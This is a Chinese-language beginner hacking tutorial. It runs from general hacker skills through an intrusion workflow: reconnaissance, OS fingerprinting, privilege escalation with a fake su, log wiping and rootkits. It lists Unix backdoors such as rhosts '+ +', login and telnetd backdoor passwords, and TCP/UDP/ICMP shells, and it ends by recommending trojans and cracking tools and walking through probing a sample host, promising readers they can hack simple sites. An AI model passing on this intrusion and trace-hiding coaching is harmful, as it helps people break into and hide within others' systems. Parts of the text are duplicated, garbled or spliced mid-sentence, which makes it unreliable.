老掉牙的黑客经典教程

[(第1章 一个黑客的基本技能)]

１、黑客的精神态度是很重要的，但技术则更是重要。黑客的态度虽然是无可取代，随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序，直到最近我们开始使用HTML。不过，在1996年末,当然，这是基础的hacking技能。在1997年，理所当然的，你必须学会C。 但,如果你只是学一种语言，那么你不能算是一位黑客，了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客，你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说，你必会学还了C之外的东西，你至少还要会LISP或Perl（Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单）。除了几个重要的hacking常用语言之外，这些语言提供你一些不同的程序设计途径，并且让你在好的方法中学习。

程序设计是一种复杂的技术，我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西（有很多，几乎全部最好的黑客们都是自习而来的）。（a） 读别人的程序码；（写程序，这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言，最好的方法是去看一些专家们所写的东西，然后写一些你自己的东西，然后读更多，再写更多。然后一直持续，一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事，因为，对菜鸟黑客们而言，适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统（大都公开提供 source，而且全都是由黑客们写成的）到处可看。进入下一个主题。

２、取得一个免费的 UNIX，并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部（现在的小孩子真幸福，可如此轻易的拥有 :-））。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix，并将它安装在自己的机器，并使之顺利的运作。没错，在这个世界上除了Unix之外，还有其它的操作系统。但是他们只提供bianry，你不能看到他们的程序码，你也不能修改他们。想要在DOS或Windows或MacOS开始hacking，无疑就是要你绑著枷锁跳舞一样。

除此之外，Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时，你没辨法在不懂Unix的情况下成为Internet的黑客。因为这个原故，现在的黑客文化还是很牢固的以Unix为中心。（这并不完全是正确的，而且有些活在旧时代的黑客甚至也不喜欢这种情形，但是Unix和Internet之间的共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。） 因些，把Unix装起来吧! （我自己是喜欢Linux，但是还有其它的东东可用。） 学习它，让它运作起来，让它陪你努力精进。 用他向整个Internet喊话。看程序码，改程序。

有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft操作系统所能提供的还要好的程序设计工具（包括 C，Lisp和 Perl）。而且得到快乐，并学到比共生共成己经到了牢不可破的地步，即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。） 因些，把Unix装起来吧! （我自己是喜欢Linux，但是还有其它的东东可用。） 学习它，让它运作起来，让它陪你努力精进。用他向整个Internet喊话。 看程序码，改程序。有一天你成为一位高竿的黑客，你回头往后看时会发现，你得到比Microsoft操作系统所能提供的还要好的程序设计工具（包括 C，Lisp和 Perl）。而且得到快乐，并

学到比你想像中的还要多的知识。关于学习Unix，在Loginataka有更多的资料。（http://www.ccil.org/~esr/faqs/loginataka。）

看一下Linux distribution的目录或 Linux CD，并把自己交付给它。

3、学习使用World Wide Web并学会写 HTML。

在黑客文化创造出来的东西，大多在他们的活动范围外被使用著，如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外，这个黑客眼中的大玩具甚至还被政客们接受，并巧巧的在改变这个世界。因此（还有很多好的理由），你必须学习Web。并不只是学习使用browser（这太容易了）而己，还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序，写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过，有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page，而且大部份都没什么重点，没什么内容的烂泥 — 很好看的烂泥巴，但是看起来都一样，差不多。

4、至少学会以下的其中两种：

一、网站服务器程序ASP、PHP、CGI、jsP

我个人认为CGI是最难学的其中一种。

二、程序语言：C语言、C++、VB、J**A、PERL、DELPHI、汇编语言

不过我认为C语言的通用性最好，可以跨平台（操作系统）使用。

还要试着自己写程序、开发软件等工作。

三、数据库管理软件：MYSQL、SQL、FOXPRO……等。

四、几种常用的操作系统：WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。

如果以上的你都会了，那么你已经是个高手了。

(本章完)

[(第2章 黑客初级技术讲解（上）)]

网络安全从其本质上来讲就是网络上的信息安全。从广义来说，凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标，信息安全包括两个方面：信息的存 储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全，如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全，有以下几个问题：

　　（１）对网络上信息的监听

　　（２）对用户身份的仿冒

　　（３）对网络上信息的篡改

　　（４）对发出的信息予以否认

　　（５）对信息进行重发

　　对于一般的常用入侵方法主要有

　　1.口令入侵

　　所谓口令入侵，就是指用一些软件解开已经得到但被人加密的口令文档，不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为”Crack”。由于这些软件的广为流传，使得入侵电脑网络系统有时变得相当简单，一般不需要很深入了解系统的内部结构，是初学者的好方法。

　　2.特洛伊木马术

　　说到特洛伊木马，只要知道这个故事的人就不难理解，它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中，这时合法用户的程序代码已被该变。一旦用户触发该程序，那么依附在内的黑客指令代码同时被激活，这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验，且要更改代码、要一定的权限，所以较难掌握。但正因为它的复杂性，一般的系统管理员很难发现。

　　3.监听法

　　这是一个很实用但风险也很大的黑客入侵方法，但还是有很多入侵系统的黑客采用此类方法，正所谓艺高人胆大。

　　网络节点或工作站之间的交流是通过信息流的转送得以实现，而当在一个没有集线器的网络中，数据的传输并没有指明特定的方向，这时每一个网络节点或工作站都是一个接口。这就好比某一节点说：”嗨！你们中有谁是我要发信息的工作站。”

　　此时，所有的系统接口都收到了这个信息，一旦某个工作站说：”嗨！那是我，请把数据传过来。”联接就马上完成。

　　目前有网络上流传着很多嗅探软件，利用这些软件就可以很简单的监听到数据，甚至就包含口令文件，有的服务在传输文件中直接使用明文传输，这也是非常危险的

4.E-mail技术

　　使用email加木马程序这是黑客经常使用的一种手段，而且非常奏效，一般的用户，甚至是网管，对网络安全的意识太过于淡薄，这就给很多黑客以可乘之机。

　　5.病毒技术

　　作为一个黑客，如此使用应该是一件可耻的事情，不过大家可以学习，毕竟也是一种攻击的办法，特殊时间，特殊地点完全可以使用。

　　6.隐藏技术

　　网络攻击的一般步骤及实例

　　攻击的准备阶段

　　首先需要说明的是，入侵者的来源有两种，一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵，包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。

　　进行网络攻击是一件系统性很强的工作，其主要工作流程是：收集情报，远程攻击，远程登录，取得普通用户的权限，取得超级用户的权限，留下后门，清除日志。主要内容包括目标分析，文档获取，破解密码，日志清除等技术，下面分别介绍。

　　1.确定攻击的目的

　　攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的，即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标，使其不能正常工作，而不能随意控制目标的系统的运行。要达到破坏型攻击的目的，主要的手段是拒绝服务攻击（Denial Of Service）。另一类常见的攻击目的是入侵攻击目标，这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍，威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作，包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露，攻击者靠猜测或者穷举法来得到服务器用户的密码，然后就可以用和真正的管理员一样对服务器进行访问。

　　2.信息收集

　　除了确定攻击目的之外，攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本，目标提供哪些服务，各服务器程序的类型与版本以及相关的社会信息。

　　要攻击一台机器，首先要确定它上面正在运行的操作系统是什么，因为对于不同类型的操作系统，其上的系统漏洞有很大区别，所以攻击的方法也完全不同，甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验，有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时，如果显示

　　Unix（r）System V Release 4．0

　login：

　　那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5．5或5．5．l。但这样确定操作系统类型是不准确的，因为有些网站管理员为了迷惑攻击者会故意更改显示信息，造成假象。

还有一种不是很有效的方法，诸如查询DNS的主机信息（不是很可靠）来看登记域名时的申请机器类型和操作系统类型，或者使用社会工程学的方法来获得，以及利用某些主机开放的SNMP的公共组来查询。

　　另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的”指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包，然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包（或者是任何没有ACK或SYN标记的包）到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP／UX和 IRIX会返回一个RESET。通过发送一个SYN包，它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记，而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类，如较早的Unix系统是64K长度，一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度，这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多，比较著名的有NMAP、CHECKOS、QUESO等。

　　获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要，因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口，例如一般TELNET在23端口，FTP在对21端口，WWW在80端口或8080端口，这只是一般情况，网站管理完全可以按自己的意愿修改服务所监听的端口号。在不同服务器上提供同一种服务的软件也可以是不同，我们管这种软件叫做daemon，例如同样是提供FTP服务，可以使用wuftp、proftp，ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。

　　另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息，例如网站所属公司的名称、规模，网络管理员的生活习惯、电话号码等。这些信息看起来与攻击一个网站没有关系，实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的电话号码做系统密码，如果掌握了该电话号码，就等于掌握了管理员权限进行信息收集可以用手工进行，也可以利用工具来完成，完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快，可以一次对多个目标进行扫描。

　　攻击的实施阶段

　　1.获得权限

　　当收集到足够的信息之后，攻击者就要开始实施攻击行动了。作为破坏性攻击，只需利用工具发动攻击即可。而作为入侵性攻击，往往要利用收集到的信息，找到其系统漏洞，然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了，但作为一次完整的攻击是要获得系统最高权限的，这不仅是为了达到一定的目的，更重要的是证明攻击者的能力，这也符合黑客的追求。

　　能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞，也包括由于管理配置不当而造成的漏洞。前不久，因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破，其主页面上的 Powered by Apache图样（羽毛状的图画）被改成了Powered by　Microsoft Backoffice的图样，那个攻击者就是利用了管理员对Webserver用数据库的一些不当配置而成功取得最高权限的。

黑客初级技术讲解（中）

　　当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍，据统计80％以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。

　　无论作为一个黑客还是一个网络管理员，都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击，而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息，可以到诸如Rootshell（www.rootshell．com）、Packetstorm（packetstorm．securify．com）、Securityfocus（www.securityfocus．com）等网站去查找。

　　2.权限的扩大

　　系统漏洞分为远程漏洞和本地漏洞两种，远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大，黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限，而往往只是一个普通用户的权限，这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大，常常是扩大至系统的管理员权限。

只有获得了最高的管理员权限之后，才可以做诸如网络监听、打扫痕迹之类的事情。要完成权限的扩大，不但可以利用已获得的权限在系统上执行利用本地漏洞的程序，还可以放一些木马之类的欺骗程序来套取管理员密码，这种木马是放在本地套取最高权限用的，而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限，那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序，当真正的合法用户登录时，运行了su，并输入了密码，这时root密码就会被记录下来，下次黑客再登录时就可以使用su变成root了。

　　
 

(本章完)

[(第3章 黑客初级技术讲解（上续）)]

攻击的善后工作

　　1.日志系统简介

　　如果攻击者完成攻击后就立刻离开系统而不做任何善后工作，那么他的行踪将很快被系统管理员发现，因为所有的网络操作系统一般都提供日志记录功能，会把系统上发生的动作记录下来。所以，为了自身的隐蔽性，黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法，首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置，根据操作系统的不同略有变化

　　／usr／adm——早期版本的Unix。

　　／Var／adm新一点的版本使用这个位置。

　　／Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。

　　／etc，大多数Unix版本把Utmp放在此处，一些Unix版本也把Wtmp放在这里，这也是Syslog．conf的位置。

　　下面的文件可能会根据你所在的目录不同而不同：

　　acct或pacct－一记录每个用户使用的命令记录。

　　accesslog主要用来服务器运行了NCSA HTTP服务器，这个记录文件会记录有什么站点连接过你的服务器。

　　aculo保存拨出去的Modems记录。

　　lastlog记录了最近的Login记录和每个用户的最初目的地，有时是最后不成功Login的记录。

　　loginlog一记录一些不正常的L0gin记录。

　　messages——记录输出到系统控制台的记录，另外的信息由Syslog来生成

　　security记录一些使用 UUCP系统企图进入限制范围的事例。

　　sulog记录使用su命令的记录。

　　utmp记录当前登录到系统中的所有用户，这个文件伴随着用户进入和离开系统而不断变化。

　　Utmpx，utmp的扩展。

　　wtmp记录用户登录和退出事件。

　　Syslog最重要的日志文件，使用syslogd守护程序来获得。

　　2.隐藏踪迹

　　攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了（只对常规 Unix系统而言），包括日志文件，所以一般黑客想要隐藏自己的踪迹的话，就会对日志进行修改。最简单的方法当然就是删除日志文件了，但这样做虽然避免了系统管理员根据IP追踪到自己，但也明确无误地告诉了管理员，系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别，网络上有许多此类功能的程序，例如 zap、 wipe等，其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息，使得当使用w、who、last等命令查看日志文件时，隐藏掉此用户的信息。

管理员想要避免日志系统被黑客修改，应该采取一定的措施，例如用打印机实时记录网络日志信息。但这样做也有弊端，黑客一旦了解到你的做法就会不停地向日志里写入无用的信息，使得打印机不停地打印日志，直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上，即使用loghost。即使是这样也不能完全避免日志被修改的可能性，因为黑客既然能攻入这台主机，也很可能攻入loghost。

　　只修改日志是不够的，因为百密必有一漏，即使自认为修改了所有的日志，仍然会留下一些蛛丝马迹的。例如安装了某些后门程序，运行后也可能被管理员发现。所以，黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit，这类程序在一些黑客网站可以找到，比较常见的有LinuxRootKit，现在已经发展到了5.0版本了。它可以替换系统的ls、ps、netstat、inetd等等一系列重要的系统程序，当替换了ls后，就可以隐藏指定的文件，使得管理员在使用ls命令时无法看到这些文件，从而达到隐藏自己的目的。

　　3.后门

　　 一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点，黑客会留下一个后门，特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种，下面介绍几种常见的后门，供网络管理员参考防范。

　　<1>密码破解后门

　　这是入侵者使用的最早也是最老的方法，它不仅可以获得对Unix机器的访问，而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号，这些新的帐号仍然可能是重新侵入的后门。多数情况下，入侵者寻找口令薄弱的未使用帐号，然后将口令改的难些。当管理员寻找口令薄弱的帐号是，也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。

　　<2>Rhosts + + 后门

　　在连网的Unix机器中，象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入+ +，就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时，入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh，因为它通常缺少日志能力. 许多管理员经常检查 + +，所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名，从而不易被发现。

　　<3>校验和及时间戳后门

　　早期，许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变，如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间，然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步，就可以把系统时间设回当前时间。Sum程序是基于CRC校验，很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的，MD5使用的算法目前还没人能骗过。

(本章完)

[(第4章 黑客初级技术讲解（下）)]

<4>Login后门

　　在Unix里，login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改，使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令，它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号，甚至 是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的，所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后，便 用strings命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令，使strings命令失效<5>Telnetd后门

　　当用户telnet到系统，监听端口的inetd服务接受连接随后递给in.telnetd，由它运行 login.一些入侵者知道管理员会检查login是否被修改，就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验，比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门，当终端设置为letmein时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门，对来自特定源端口的连接产 生一个shell。

　　<6>服务后门

　　几乎所有网络服务曾被入侵者作过后门. Finger，rsh，rexec，rlogin，ftp，甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell，通过后门口令就能获取访问。这些程序有时用刺娲□？Ucp这样不用的服务，或者被加入inetd.conf 作为一个新的服务，管理员应该非常注意那些服务正在运行，并用MD5对原服务程序做校验。

　　<7>Cronjob后门

　　Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行，那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序，同时置入后门。

　　<8>库后门

　　几乎所有的UNIX系统使用共享库，共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门；象login.c这样的程序调用了 crypt（）。当使用后门口令时产生一个shell。 因此，即使管理员用MD5检查login程序，仍然能产生一个后门函数，而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验，有一种办法是入侵者对open（）和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以 当MD5读这些文件时，校验和一切正常，但当系统运行时将执行trojan版本的，即使trojan库本身也可躲过MD5校验，对于管理员来说有一种方法可以找到后门，就是静态编连MD5校验程序然后运行，静态连接程序不会使用trojan共享库。

　　<9>内核后门

　　内核是Unix工作的核心，用于库躲过MD5校验的方法同样适用于内核级别，甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的，所幸的是内核的 后门程序还不是随手可得，每人知道它事实上传播有多广。

　<10>文件系统后门

　　入侵者需要在服务器上存储他们的掠夺品或数据，并不能被管理员发现，入侵者的文章常是包括exploit脚本工具，后门集，sniffer日志，email的备分，原代码，等等！有时为了防止管理员发现这么大的文件，入侵者需要修补ls，du，fsck以隐匿特定的目录和文件，在很低的级别，入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分，且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件，对于普通的管理员来说，很难发现这些坏扇区里的文件系统，而它又确实存在。

　　<11>Boot块后门

　　在PC世界里，许多病毒藏匿与根区，而杀病毒软件就是检查根区是否被改变。Unix下，多数管理员没有检查根区的软件，所以一些入侵者将一些后门留在根区。

. 所以更多的管理员是 用MD5校验和检测这种后门的。

<12>隐匿进程后门

　　入侵者通常想隐匿他们运行的程序，这样的程序一般是口令破解程序和监听程序 （sniffer），有许多办法可以实现，这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将sniffer程序改名类似in.syslog再执行，因此 当管理员用ps检查运行进程时，出现 的是标准服务名。可以修改库函数致使 ps不能显示所有进程，可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是

　　amod.tar.gz :

　　http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行，管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP，UDP和ICMP，但也可能是其他类型报文。

　　<14>TCP Shell 后门

　　入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下，他 们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态，那些端口在侦听，目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wrapper技术. 这些后门可以放在**TP端口，许多防火墙允许 e-mail通行的.

　　<15>UDP Shell 后门

　　管理员经常注意TCP连接并观察其怪异情况，而UDP Shell后门没有这样的连接，所以 netstat不能显示入侵者的访问痕迹，许多防火墙设置成允许类似DNS的UDP报文的通行，通常入侵者将UDP Shell放置在这个端口，允许穿越防火墙。

　　<16>ICMP Shell 后门

　　Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器，入侵者可以放数据入Ping的ICMP包，在ping的机器间形成一个shell通道，管理员也许会注意到Ping包暴风，但除了他查看包内数据，否者入侵者不会暴露。

　　<17>加密连接

　　管理员可能建立一个sniffer试图某个访问的数据，但当入侵者给网络通行后门加密 后，就不可能被判定两台机器间的传输内容了。

(本章完)

[(第5章 黑客初级技术讲解（下续一）)]

基础知识（1）

我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。

第一节，伸展运动。这节**们要准备道具，俗话说：”工欲善其事，必先利其器”（是这样吗？哎！文化低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。

1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？wap?呵呵！属于自己很重要，否则安全性是个很大的问题。第一点相信大家没有问题。

2，windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆game fan）对网络支持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000，这是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。

3，冰河。中国第一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客的兴趣，同时帮助你了解网络，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！）

4，oicq。我们学黑客，可不是学泡mm!bfctx你………… 息怒息怒！我们当然是学黑客，但不要忘了，众人拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间！最后补充：mm不能不泡。（谁砸我？？！！）

5，superscan。很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！

6，一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

7，lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只要你拿的到sam，你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！

8，程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被你骗倒：〉 （比较理想化）

9，流光4for 2000/nt。可能是世界上最好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快，方法多，对有漏洞的主机是毁灭性的打击，操作又方便，是快速黑站必不可少的精品工具。超级吐血推荐！！

10，良好的心态，稳定的情绪，刻苦钻研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。

第一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站（哎哟！心慌了！）

下一节**们要介绍如何掌握一台主机的基本信息，期待中……

真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始做操。

今天的内容是获得主机的信息。 我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录，端口，漏洞等等。

首先我们我们要找一台主机来练手，随便挑吧！www.flyingfish.com（乱说的）

第一部，呵呵，先在ie里看看吧，mmmm…..做的还行，挺精致的！主要是我们肯定了它现在是正常的。 然后，我们应该知道它的ip,很简单，ping它一下就可以了。

ping www.flyingfish.com，看看窗口里有了什么？是不是有三行回应，其中的111.111.222.222就是ip了（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；第二，该主机装了防火墙，禁止ping,不过这种可能很小。

知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

21–ftp 重要哦

23–telnet 欢呼吧

25-smtp 尽管重要，但似乎没什么可利用的

53–domain 同上

79–finger 可知道用户信息了

80–http 要看网页，没它不行吧

110–pop 收信的

139–netbios 共享用的，很有利用价值哦

3389–win2000超级终端 呵呵，这个好！

其实端口有上千种，这些最最常用

我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan ,super scan,flux等等很多哦。这里我推荐super scan ，速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧!）

那么我们该如何应对呢？

ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scan flux等吧！反正，有ftp就有一份希望

telnet在！好!telnet 111.111.222.222，出现窗口了吧！嗯？要密码？看来网管还不是超级注意文明用语：）随便猜个，错了，闪人！

smtp,看着它，无奈

domain，一般它带了局域网了

finger 可以知道用户列表了，不好，忘了用法了，幸好finger很少出现

80肯定在，我们等会来对付它

110 有smtp，pop在也不奇怪了

139 找个扫描器来找找有没有露在外面的共享吧，日后也用得着

3389 太太太好了！！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它3389会很方便的。

端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。

掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。

对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找**吧！

目前广泛利用和存在的漏洞有：unicode,unicode后续，iis溢出，.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！

